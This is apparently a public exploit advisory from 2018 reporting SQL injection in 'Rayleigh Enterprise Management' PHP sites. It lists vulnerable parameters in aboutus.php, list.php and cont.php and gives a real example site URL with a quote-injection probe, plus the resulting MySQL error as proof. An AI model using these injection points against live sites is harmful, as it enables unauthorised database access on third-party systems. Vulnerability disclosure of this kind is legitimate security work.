###############################################################

# Exploit Title : Rayleigh Enterprise Management MiitBeianGovCn 1.0 SQL
Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : miitbeian.gov.cn
# Tested On : Windows
# Exploit Risk : Medium
# Version Information : 1.0
# CWE : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm.Org Exploit Reference Link :
cyberizm.org/cyberizm-rayleigh-enterprise-management-delling-sql-injection.html

###############################################################

CopyRight A(c) 2013 Rayleigh Enterprise Management

Technical Support Delling China SQL Injection Vulnerability

###############################################################

# Exploit : /aboutus.php?id=[ID-Number]&type=[SQL Injection]

# Exploit : /list.php?big_id=[ID-Number]&sec_id=[SQL Injection]

# Exploit : /cont.php?id=[ID-Number]&sec_id=[ID-Number]&big_id=[ID-Number]

###############################################################

# Example Site =>  relay2009.com/aboutus.php?id=1&type=1%27

 => [ Proof of Concept for SQL Inj ] => archive.is/fEijr

# SQL/DB Error :

Error! info: Can not Select to MySQL server!

Script: /aboutus.php

Error: You have an error in your SQL syntax; check

the manual that corresponds

to your MySQL server version for the right syntax

to use near '\' and language=0' at line 1 Errno.: 1064

###############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###############################################################